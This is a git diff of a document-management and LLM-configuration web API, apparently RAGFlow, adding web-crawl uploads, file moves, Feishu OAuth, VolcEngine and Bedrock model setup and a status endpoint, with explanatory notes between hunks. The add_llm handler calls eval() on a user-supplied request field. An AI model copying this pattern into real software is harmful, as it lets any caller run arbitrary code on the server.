from api.utils.api_utils import get_json_result
from rag.utils.minio_conn import MINIO
from api.utils.file_utils import filename_type, thumbnail
from api.utils.web_utils import html2pdf, is_valid_url
from api.utils.web_utils import html2pdf, is_valid_url
@manager.route('/upload', methods=['POST'])
@ -59,12 +61,19 @@ def upload():
return get_json_result(
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
e, kb = KnowledgebaseService.get_by_id(kb_id)
if not e:
raise LookupError("Can't find this knowledgebase!")
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, current_user.id)
kb_root_folder = FileService.get_kb_folder(current_user.id)
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
err = []
for file in file_objs:
try:
e, kb = KnowledgebaseService.get_by_id(kb_id)
if not e:
raise LookupError("Can't find this knowledgebase!")
MAX_FILE_NUM_PER_USER = int(os.environ.get('MAX_FILE_NUM_PER_USER', 0))
if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(kb.tenant_id) >= MAX_FILE_NUM_PER_USER:
raise RuntimeError("Exceed the maximum file number of a free user!")
@ -96,9 +105,13 @@ def upload():
}
if doc["type"] == FileType.VISUAL:
doc["parser_id"] = ParserType.PICTURE.value
if doc["type"] == FileType.AURAL:
doc["parser_id"] = ParserType.AUDIO.value
if re.search(r"\.(ppt|pptx|pages)$", filename):
doc["parser_id"] = ParserType.PRESENTATION.value
DocumentService.insert(doc)
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
except Exception as e:
err.append(file.filename + ": " + str(e))
if err:
@ -107,6 +120,70 @@ def upload():
return get_json_result(data=True)
@manager.route('/web_crawl', methods=['POST'])
@login_required
@validate_request("kb_id", "name", "url")
def web_crawl():
kb_id = request.form.get("kb_id")
if not kb_id:
return get_json_result(
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
name = request.form.get("name")
url = request.form.get("url")
if not is_valid_url(url):
return get_json_result(
data=False, retmsg='The URL format is invalid', retcode=RetCode.ARGUMENT_ERROR)
e, kb = KnowledgebaseService.get_by_id(kb_id)
if not e:
raise LookupError("Can't find this knowledgebase!")
blob = html2pdf(url)
if not blob: return server_error_response(ValueError("Download failure."))
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, current_user.id)
kb_root_folder = FileService.get_kb_folder(current_user.id)
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
try:
filename = duplicate_name(
DocumentService.query,
name=name+".pdf",
kb_id=kb.id)
filetype = filename_type(filename)
if filetype == FileType.OTHER.value:
raise RuntimeError("This type of file has not been supported yet!")
location = filename
while MINIO.obj_exist(kb_id, location):
location += "_"
MINIO.put(kb_id, location, blob)
doc = {
"id": get_uuid(),
"kb_id": kb.id,
"parser_id": kb.parser_id,
"parser_config": kb.parser_config,
"created_by": current_user.id,
"type": filetype,
"name": filename,
"location": location,
"size": len(blob),
"thumbnail": thumbnail(filename, blob)
}
if doc["type"] == FileType.VISUAL:
doc["parser_id"] = ParserType.PICTURE.value
if doc["type"] == FileType.AURAL:
doc["parser_id"] = ParserType.AUDIO.value
if re.search(r"\.(ppt|pptx|pages)$", filename):
doc["parser_id"] = ParserType.PRESENTATION.value
DocumentService.insert(doc)
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
except Exception as e:
return server_error_response(e)
return get_json_result(data=True)
@manager.route('/create', methods=['POST'])
@login_required
@validate_request("name", "kb_id")
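The `web_crawl` handler added above rejects a request when `is_valid_url(url)` is false, but the body of that helper from `api.utils.web_utils` is not part of this diff. As a rough idea of what such a check could look like, here is a sketch built on the standard library. The function name `looks_like_http_url` and its rules (http or https scheme plus a non-empty host) are assumptions, not the project's implementation.

```python
from urllib.parse import urlparse


def looks_like_http_url(url):
    """Accept only absolute http(s) URLs that carry a network location."""
    if not isinstance(url, str):
        return False
    parts = urlparse(url.strip())
    return parts.scheme in ("http", "https") and bool(parts.netloc)


accepted = looks_like_http_url("https://example.com/docs/page.html")
rejected = looks_like_http_url("ftp://example.com/file.txt")
```

A syntactic check like this does not confirm that the page is reachable, which is why the handler separately reports a download failure when `html2pdf` returns nothing.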
@ -145,7 +222,7 @@ def create():
@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_docs():
kb_id = request.args.get("kb_id")
if not kb_id:
return get_json_result(
@ -228,34 +305,36 @@ def rm():
req = request.json
doc_ids = req["doc_id"]
if isinstance(doc_ids, str): doc_ids = [doc_ids]
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, current_user.id)
errors = ""
for doc_id in doc_ids:
try:
e, doc = DocumentService.get_by_id(doc_id)
if not e:
return get_data_error_result(retmsg="Document not found!")
tenant_id = DocumentService.get_tenant_id(doc_id)
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not DocumentService.delete(doc):
b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
if not DocumentService.remove_document(doc, tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
informs = File2DocumentService.get_by_document_id(doc_id)
if not informs:
MINIO.rm(doc.kb_id, doc.location)
else:
File2DocumentService.delete_by_document_id(doc_id)
f2d = File2DocumentService.get_by_document_id(doc_id)
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
File2DocumentService.delete_by_document_id(doc_id)
MINIO.rm(b, n)
except Exception as e:
errors += str(e)
if errors: return server_error_response(e)
if errors:
return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)
return get_json_result(data=True)
@ -278,7 +357,7 @@ def run():
return get_data_error_result(retmsg="Tenant not found!")
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=id), idxnm=search.index_name(tenant_id))
if str(req["run"]) == TaskStatus.RUNNING.value:
TaskService.filter_delete([Task.doc_id == id])
e, doc = DocumentService.get_by_id(id)
@ -307,9 +386,10 @@ def rename():
data=False,
retmsg="The extension of file can't be changed",
retcode=RetCode.ARGUMENT_ERROR)
if DocumentService.query(name=req["name"], kb_id=doc.kb_id):
return get_data_error_result(
retmsg="Duplicated document name in the same knowledgebase.")
for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
if d.name == req["name"]:
return get_data_error_result(
retmsg="Duplicated document name in the same knowledgebase.")
if not DocumentService.update_by_id(
req["doc_id"], {"name": req["name"]}):
@ -334,12 +414,8 @@ def get(doc_id):
if not e:
return get_data_error_result(retmsg="Document not found!")
informs = File2DocumentService.get_by_document_id(doc_id)
if not informs:
response = flask.make_response(MINIO.get(doc.kb_id, doc.location))
else:
e, file = FileService.get_by_id(informs[0].file_id)
response = flask.make_response(MINIO.get(file.parent_id, doc.location))
b,n = File2DocumentService.get_minio_address(doc_id=doc_id)
response = flask.make_response(MINIO.get(b, n))
ext = re.search(r"\.([^.]+)$", doc.name)
if ext:

View File

@ -58,11 +58,7 @@ def convert():
tenant_id = DocumentService.get_tenant_id(doc_id)
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not DocumentService.delete(doc):
if not DocumentService.remove_document(doc, tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
File2DocumentService.delete_by_file_id(id)
@ -125,11 +121,7 @@ def rm():
tenant_id = DocumentService.get_tenant_id(doc_id)
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not DocumentService.delete(doc):
if not DocumentService.remove_document(doc, tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
return get_json_result(data=True)

View File

@ -26,7 +26,7 @@ from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.db import FileType
from api.db import FileType, FileSource
from api.db.services import duplicate_name
from api.db.services.file_service import FileService
from api.settings import RetCode
@ -45,7 +45,7 @@ def upload():
if not pf_id:
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder.id
pf_id = root_folder["id"]
if 'file' not in request.files:
return get_json_result(
@ -132,7 +132,7 @@ def create():
input_file_type = request.json.get("type")
if not pf_id:
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder.id
pf_id = root_folder["id"]
try:
if not FileService.is_parent_folder_exist(pf_id):
@ -165,7 +165,7 @@ def create():
@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_files():
pf_id = request.args.get("parent_id")
keywords = request.args.get("keywords", "")
@ -176,7 +176,8 @@ def list():
desc = request.args.get("desc", True)
if not pf_id:
root_folder = FileService.get_root_folder(current_user.id)
pf_id = root_folder.id
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, current_user.id)
try:
e, file = FileService.get_by_id(pf_id)
if not e:
@ -199,7 +200,7 @@ def list():
def get_root_folder():
try:
root_folder = FileService.get_root_folder(current_user.id)
return get_json_result(data={"root_folder": root_folder.to_json()})
return get_json_result(data={"root_folder": root_folder})
except Exception as e:
return server_error_response(e)
@ -250,6 +251,8 @@ def rm():
return get_data_error_result(retmsg="File or Folder not found!")
if not file.tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
if file.source_type == FileSource.KNOWLEDGEBASE:
continue
if file.type == FileType.FOLDER.value:
file_id_list = FileService.get_all_innermost_file_ids(file_id, [])
@ -274,11 +277,7 @@ def rm():
tenant_id = DocumentService.get_tenant_id(doc_id)
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not DocumentService.delete(doc):
if not DocumentService.remove_document(doc, tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
File2DocumentService.delete_by_file_id(file_id)
@ -303,9 +302,10 @@ def rename():
data=False,
retmsg="The extension of file can't be changed",
retcode=RetCode.ARGUMENT_ERROR)
if FileService.query(name=req["name"], pf_id=file.parent_id):
return get_data_error_result(
retmsg="Duplicated file name in the same folder.")
for file in FileService.query(name=req["name"], pf_id=file.parent_id):
if file.name == req["name"]:
return get_data_error_result(
retmsg="Duplicated file name in the same folder.")
if not FileService.update_by_id(
req["file_id"], {"name": req["name"]}):
@ -331,8 +331,8 @@ def get(file_id):
e, file = FileService.get_by_id(file_id)
if not e:
return get_data_error_result(retmsg="Document not found!")
response = flask.make_response(MINIO.get(file.parent_id, file.location))
b, n = File2DocumentService.get_minio_address(file_id=file_id)
response = flask.make_response(MINIO.get(b, n))
ext = re.search(r"\.([^.]+)$", file.name)
if ext:
if file.type == FileType.VISUAL.value:
@ -343,5 +343,28 @@ def get(file_id):
'application/%s' %
ext.group(1))
return response
except Exception as e:
return server_error_response(e)
@manager.route('/mv', methods=['POST'])
@login_required
@validate_request("src_file_ids", "dest_file_id")
def move():
req = request.json
try:
file_ids = req["src_file_ids"]
parent_id = req["dest_file_id"]
for file_id in file_ids:
e, file = FileService.get_by_id(file_id)
if not e:
return get_data_error_result(retmsg="File or Folder not found!")
if not file.tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
fe, _ = FileService.get_by_id(parent_id)
if not fe:
return get_data_error_result(retmsg="Parent Folder not found!")
FileService.move_file(file_ids, parent_id)
return get_json_result(data=True)
except Exception as e:
return server_error_response(e)
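
The rename hunks in this file and in the document app replace a bare "query returned something" test with a loop that compares each returned name to the requested one. A minimal sketch of that idea follows, assuming the lookup can return rows whose names differ only by case (for example under a case-insensitive collation; the diff does not state the motive). The helper name `has_exact_duplicate` and the sample data are hypothetical.

```python
from typing import Iterable


def has_exact_duplicate(existing_names: Iterable[str], new_name: str) -> bool:
    """Return True only when some existing name equals new_name exactly."""
    return any(name == new_name for name in existing_names)


# Names a case-insensitive lookup for "Report.pdf" might hand back (made-up data).
rows = ["report.pdf", "REPORT.PDF"]
print(has_exact_duplicate(rows, "Report.pdf"))                   # False
print(has_exact_duplicate(rows + ["Report.pdf"], "Report.pdf"))  # True
```

With this shape, a rename to a name that differs only in case from a sibling is not rejected as a duplicate, which matches what the looped check in the hunk appears to allow.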

View File

@ -19,12 +19,14 @@ from flask_login import login_required, current_user
from api.db.services import duplicate_name
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.user_service import TenantService, UserTenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid, get_format_time
from api.db import StatusEnum, UserTenantRole
from api.db import StatusEnum, UserTenantRole, FileSource
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.db_models import Knowledgebase
from api.db.db_models import Knowledgebase, File
from api.settings import stat_logger, RetCode
from api.utils.api_utils import get_json_result
from rag.nlp import search
@ -109,7 +111,7 @@ def detail():
@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_kbs():
page_number = request.args.get("page", 1)
items_per_page = request.args.get("page_size", 150)
orderby = request.args.get("orderby", "create_time")
@ -136,17 +138,14 @@ def rm():
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)
for doc in DocumentService.query(kb_id=req["kb_id"]):
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(kbs[0].tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not DocumentService.delete(doc):
if not DocumentService.remove_document(doc, kbs[0].tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
f2d = File2DocumentService.get_by_document_id(doc.id)
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
File2DocumentService.delete_by_document_id(doc.id)
if not KnowledgebaseService.update_by_id(
req["kb_id"], {"status": StatusEnum.INVALID.value}):
if not KnowledgebaseService.delete_by_id(req["kb_id"]):
return get_data_error_result(
retmsg="Database error (Knowledgebase removal)!")
return get_json_result(data=True)

View File

@ -20,15 +20,15 @@ from api.utils.api_utils import server_error_response, get_data_error_result, va
from api.db import StatusEnum, LLMType
from api.db.db_models import TenantLLM
from api.utils.api_utils import get_json_result
from rag.llm import EmbeddingModel, ChatModel
from rag.llm import EmbeddingModel, ChatModel, RerankModel,CvModel
import requests
@manager.route('/factories', methods=['GET'])
@login_required
def factories():
try:
fac = LLMFactoriesService.get_all()
return get_json_result(data=[f.to_dict() for f in fac if f.name not in ["Youdao", "FastEmbed"]])
return get_json_result(data=[f.to_dict() for f in fac if f.name not in ["Youdao", "FastEmbed", "BAAI"]])
except Exception as e:
return server_error_response(e)
@ -39,31 +39,43 @@ def factories():
def set_api_key():
req = request.json
# test if api key works
chat_passed = False
chat_passed, embd_passed, rerank_passed = False, False, False
factory = req["llm_factory"]
msg = ""
for llm in LLMService.query(fid=factory):
if llm.model_type == LLMType.EMBEDDING.value:
if not embd_passed and llm.model_type == LLMType.EMBEDDING.value:
mdl = EmbeddingModel[factory](
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
try:
arr, tc = mdl.encode(["Test if the api key is available"])
if len(arr[0]) == 0 or tc == 0:
raise Exception("Fail")
embd_passed = True
except Exception as e:
msg += f"\nFail to access embedding model({llm.llm_name}) using this api key." + str(e)
elif not chat_passed and llm.model_type == LLMType.CHAT.value:
mdl = ChatModel[factory](
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
try:
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
"temperature": 0.9})
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}],
{"temperature": 0.9,'max_tokens':50})
if not tc:
raise Exception(m)
chat_passed = True
except Exception as e:
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
e)
chat_passed = True
elif not rerank_passed and llm.model_type == LLMType.RERANK:
mdl = RerankModel[factory](
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
try:
arr, tc = mdl.similarity("What's the weather?", ["Is it sunny today?"])
if len(arr) == 0 or tc == 0:
raise Exception("Fail")
except Exception as e:
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
e)
rerank_passed = True
if msg:
return get_data_error_result(retmsg=msg)
@ -96,20 +108,46 @@ def set_api_key():
@validate_request("llm_factory", "llm_name", "model_type")
def add_llm():
req = request.json
factory = req["llm_factory"]
if factory == "VolcEngine":
# For VolcEngine, due to its special authentication method
# Assemble volc_ak, volc_sk, endpoint_id into api_key
temp = list(eval(req["llm_name"]).items())[0]
llm_name = temp[0]
endpoint_id = temp[1]
api_key = '{' + f'"volc_ak": "{req.get("volc_ak", "")}", ' \
f'"volc_sk": "{req.get("volc_sk", "")}", ' \
f'"ep_id": "{endpoint_id}", ' + '}'
elif factory == "Bedrock":
# For Bedrock, due to its special authentication method
# Assemble bedrock_ak, bedrock_sk, bedrock_region
llm_name = req["llm_name"]
api_key = '{' + f'"bedrock_ak": "{req.get("bedrock_ak", "")}", ' \
f'"bedrock_sk": "{req.get("bedrock_sk", "")}", ' \
f'"bedrock_region": "{req.get("bedrock_region", "")}", ' + '}'
elif factory == "LocalAI":
llm_name = req["llm_name"]+"___LocalAI"
api_key = "xxxxxxxxxxxxxxx"
else:
llm_name = req["llm_name"]
api_key = "xxxxxxxxxxxxxxx"
llm = {
"tenant_id": current_user.id,
"llm_factory": req["llm_factory"],
"llm_factory": factory,
"model_type": req["model_type"],
"llm_name": req["llm_name"],
"llm_name": llm_name,
"api_base": req.get("api_base", ""),
"api_key": "xxxxxxxxxxxxxxx"
"api_key": api_key
}
factory = req["llm_factory"]
msg = ""
if llm["model_type"] == LLMType.EMBEDDING.value:
mdl = EmbeddingModel[factory](
key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
model_name=llm["llm_name"],
base_url=llm["api_base"])
try:
arr, tc = mdl.encode(["Test if the api key is available"])
if len(arr[0]) == 0 or tc == 0:
@ -118,7 +156,10 @@ def add_llm():
msg += f"\nFail to access embedding model({llm['llm_name']})." + str(e)
elif llm["model_type"] == LLMType.CHAT.value:
mdl = ChatModel[factory](
key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
model_name=llm["llm_name"],
base_url=llm["api_base"]
)
try:
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
"temperature": 0.9})
@ -127,6 +168,36 @@ def add_llm():
except Exception as e:
msg += f"\nFail to access model({llm['llm_name']})." + str(
e)
elif llm["model_type"] == LLMType.RERANK:
mdl = RerankModel[factory](
key=None, model_name=llm["llm_name"], base_url=llm["api_base"]
)
try:
arr, tc = mdl.similarity("Hello~ Ragflower!", ["Hi, there!"])
if len(arr) == 0 or tc == 0:
raise Exception("Not known.")
except Exception as e:
msg += f"\nFail to access model({llm['llm_name']})." + str(
e)
elif llm["model_type"] == LLMType.IMAGE2TEXT.value:
mdl = CvModel[factory](
key=None, model_name=llm["llm_name"], base_url=llm["api_base"]
)
try:
img_url = (
"https://upload.wikimedia.org/wikipedia/comm"
"ons/thumb/d/dd/Gfp-wisconsin-madison-the-nature-boardwalk.jpg/256"
"0px-Gfp-wisconsin-madison-the-nature-boardwalk.jpg"
)
res = requests.get(img_url)
if res.status_code == 200:
m, tc = mdl.describe(res.content)
if not tc:
raise Exception(m)
else:
pass
except Exception as e:
msg += f"\nFail to access model({llm['llm_name']})." + str(e)
else:
# TODO: check other type of models
pass
@ -134,7 +205,6 @@ def add_llm():
if msg:
return get_data_error_result(retmsg=msg)
if not TenantLLMService.filter_update(
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory, TenantLLM.llm_name == llm["llm_name"]], llm):
TenantLLMService.save(**llm)
@ -142,6 +212,16 @@ def add_llm():
return get_json_result(data=True)
@manager.route('/delete_llm', methods=['POST'])
@login_required
@validate_request("llm_factory", "llm_name")
def delete_llm():
req = request.json
TenantLLMService.filter_delete(
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == req["llm_factory"], TenantLLM.llm_name == req["llm_name"]])
return get_json_result(data=True)
@manager.route('/my_llms', methods=['GET'])
@login_required
def my_llms():
@ -165,7 +245,7 @@ def my_llms():
@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_app():
model_type = request.args.get("model_type")
try:
objs = TenantLLMService.query(tenant_id=current_user.id)
@ -174,7 +254,7 @@ def list():
llms = [m.to_dict()
for m in llms if m.status == StatusEnum.VALID.value]
for m in llms:
m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["Youdao","FastEmbed"]
m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["Youdao","FastEmbed", "BAAI"]
llm_set = set([m["llm_name"] for m in llms])
for o in objs:
@ -184,7 +264,7 @@ def list():
res = {}
for m in llms:
if model_type and m["model_type"] != model_type:
if model_type and m["model_type"].find(model_type)<0:
continue
if m["fid"] not in res:
res[m["fid"]] = []
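
In the add_llm hunk above, the VolcEngine branch parses `llm_name` with `eval` and assembles `api_key` by concatenating f-strings, which leaves a trailing comma before the closing brace. The sketch below shows one possible alternative, not the project's implementation: `ast.literal_eval` accepts literals only, and `json.dumps` emits valid JSON. The function names `parse_volc_llm_name` and `build_volc_api_key` are hypothetical, and whatever reads the key back is not shown in this diff, so it would have to accept JSON for this to fit.

```python
import ast
import json
from typing import Tuple


def parse_volc_llm_name(raw: str) -> Tuple[str, str]:
    """Parse a one-entry mapping literal such as "{'model-x': 'ep-123'}"."""
    mapping = ast.literal_eval(raw)  # evaluates literals only, never calls code
    if not isinstance(mapping, dict) or len(mapping) != 1:
        raise ValueError("expected a mapping with exactly one entry")
    llm_name, endpoint_id = next(iter(mapping.items()))
    return llm_name, endpoint_id


def build_volc_api_key(volc_ak: str, volc_sk: str, endpoint_id: str) -> str:
    """Serialize the three credentials under the key names used in the hunk."""
    return json.dumps(
        {"volc_ak": volc_ak, "volc_sk": volc_sk, "ep_id": endpoint_id})


name, ep = parse_volc_llm_name("{'model-x': 'ep-123'}")
print(name, ep)
print(build_volc_api_key("ak", "sk", ep))
```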

api/apps/system_app.py Normal file

@ -0,0 +1,68 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
#
from flask_login import login_required
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.utils.api_utils import get_json_result
from api.versions import get_rag_version
from rag.settings import SVR_QUEUE_NAME
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.minio_conn import MINIO
from timeit import default_timer as timer
from rag.utils.redis_conn import REDIS_CONN
@manager.route('/version', methods=['GET'])
@login_required
def version():
return get_json_result(data=get_rag_version())
@manager.route('/status', methods=['GET'])
@login_required
def status():
res = {}
st = timer()
try:
res["es"] = ELASTICSEARCH.health()
res["es"]["elapsed"] = "{:.1f}".format((timer() - st)*1000.)
except Exception as e:
res["es"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
st = timer()
try:
MINIO.health()
res["minio"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
except Exception as e:
res["minio"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
st = timer()
try:
KnowledgebaseService.get_by_id("x")
res["mysql"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
except Exception as e:
res["mysql"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
st = timer()
try:
if not REDIS_CONN.health():
raise Exception("Lost connection!")
res["redis"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
except Exception as e:
res["redis"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
return get_json_result(data=res)
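
The status() endpoint repeats the same timer/try/except pattern for each backend. As an illustration only, that pattern can be folded into one helper. The name `probe` is hypothetical, and treating an explicit `False` return as a failure is an assumption modelled on the Redis branch; the Elasticsearch branch in the diff returns its own health dict, which this sketch does not reproduce.

```python
from timeit import default_timer as timer
from typing import Any, Callable, Dict


def probe(check: Callable[[], Any]) -> Dict[str, str]:
    """Run one health check; report green/red plus elapsed milliseconds."""
    start = timer()
    try:
        if check() is False:
            raise Exception("Lost connection!")
        result = {"status": "green"}
    except Exception as e:
        result = {"status": "red", "error": str(e)}
    result["elapsed"] = "{:.1f}".format((timer() - start) * 1000.0)
    return result


def unreachable():
    # Stand-in for a backend call that fails.
    raise RuntimeError("connection refused")


res = {"cache": probe(lambda: True), "store": probe(unreachable)}
print(res["cache"]["status"], res["store"]["status"])  # green red
```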

View File

@ -13,6 +13,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import re
from datetime import datetime
@ -25,8 +26,9 @@ from api.db.services.llm_service import TenantLLMService, LLMService
from api.utils.api_utils import server_error_response, validate_request
from api.utils import get_uuid, get_format_time, decrypt, download_img, current_timestamp, datetime_format
from api.db import UserTenantRole, LLMType, FileType
from api.settings import RetCode, GITHUB_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, API_KEY, \
LLM_FACTORY, LLM_BASE_URL
from api.settings import RetCode, GITHUB_OAUTH, FEISHU_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, \
API_KEY, \
LLM_FACTORY, LLM_BASE_URL, RERANK_MDL
from api.db.services.user_service import UserService, TenantService, UserTenantService
from api.db.services.file_service import FileService
from api.settings import stat_logger
@ -122,6 +124,79 @@ def github_callback():
return redirect("/?auth=%s" % user.get_id())
@manager.route('/feishu_callback', methods=['GET'])
def feishu_callback():
import requests
app_access_token_res = requests.post(FEISHU_OAUTH.get("app_access_token_url"), data=json.dumps({
"app_id": FEISHU_OAUTH.get("app_id"),
"app_secret": FEISHU_OAUTH.get("app_secret")
}), headers={"Content-Type": "application/json; charset=utf-8"})
app_access_token_res = app_access_token_res.json()
if app_access_token_res['code'] != 0:
return redirect("/?error=%s" % app_access_token_res)
res = requests.post(FEISHU_OAUTH.get("user_access_token_url"), data=json.dumps({
"grant_type": FEISHU_OAUTH.get("grant_type"),
"code": request.args.get('code')
}), headers={"Content-Type": "application/json; charset=utf-8",
'Authorization': f"Bearer {app_access_token_res['app_access_token']}"})
res = res.json()
if res['code'] != 0:
return redirect("/?error=%s" % res["message"])
if "contact:user.email:readonly" not in res["data"]["scope"].split(" "):
return redirect("/?error=contact:user.email:readonly not in scope")
session["access_token"] = res["data"]["access_token"]
session["access_token_from"] = "feishu"
userinfo = user_info_from_feishu(session["access_token"])
users = UserService.query(email=userinfo["email"])
user_id = get_uuid()
if not users:
try:
try:
avatar = download_img(userinfo["avatar_url"])
except Exception as e:
stat_logger.exception(e)
avatar = ""
users = user_register(user_id, {
"access_token": session["access_token"],
"email": userinfo["email"],
"avatar": avatar,
"nickname": userinfo["en_name"],
"login_channel": "feishu",
"last_login_time": get_format_time(),
"is_superuser": False,
})
if not users:
raise Exception('Register user failure.')
if len(users) > 1:
raise Exception('Same E-mail exist!')
user = users[0]
login_user(user)
return redirect("/?auth=%s" % user.get_id())
except Exception as e:
rollback_user_registration(user_id)
stat_logger.exception(e)
return redirect("/?error=%s" % str(e))
user = users[0]
user.access_token = get_uuid()
login_user(user)
user.save()
return redirect("/?auth=%s" % user.get_id())
def user_info_from_feishu(access_token):
import requests
headers = {"Content-Type": "application/json; charset=utf-8",
'Authorization': f"Bearer {access_token}"}
res = requests.get(
f"https://open.feishu.cn/open-apis/authen/v1/user_info",
headers=headers)
user_info = res.json()["data"]
user_info["email"] = None if user_info.get("email") == "" else user_info["email"]
return user_info
def user_info_from_github(access_token):
import requests
headers = {"Accept": "application/json",
@ -200,7 +275,7 @@ def rollback_user_registration(user_id):
except Exception as e:
pass
try:
TenantLLM.delete().where(TenantLLM.tenant_id == user_id).excute()
TenantLLM.delete().where(TenantLLM.tenant_id == user_id).execute()
except Exception as e:
pass
@ -214,7 +289,8 @@ def user_register(user_id, user):
"embd_id": EMBEDDING_MDL,
"asr_id": ASR_MDL,
"parser_ids": PARSERS,
"img2txt_id": IMAGE2TEXT_MDL
"img2txt_id": IMAGE2TEXT_MDL,
"rerank_id": RERANK_MDL
}
usr_tenant = {
"tenant_id": user_id,

api/contants.py Normal file

@ -0,0 +1,16 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
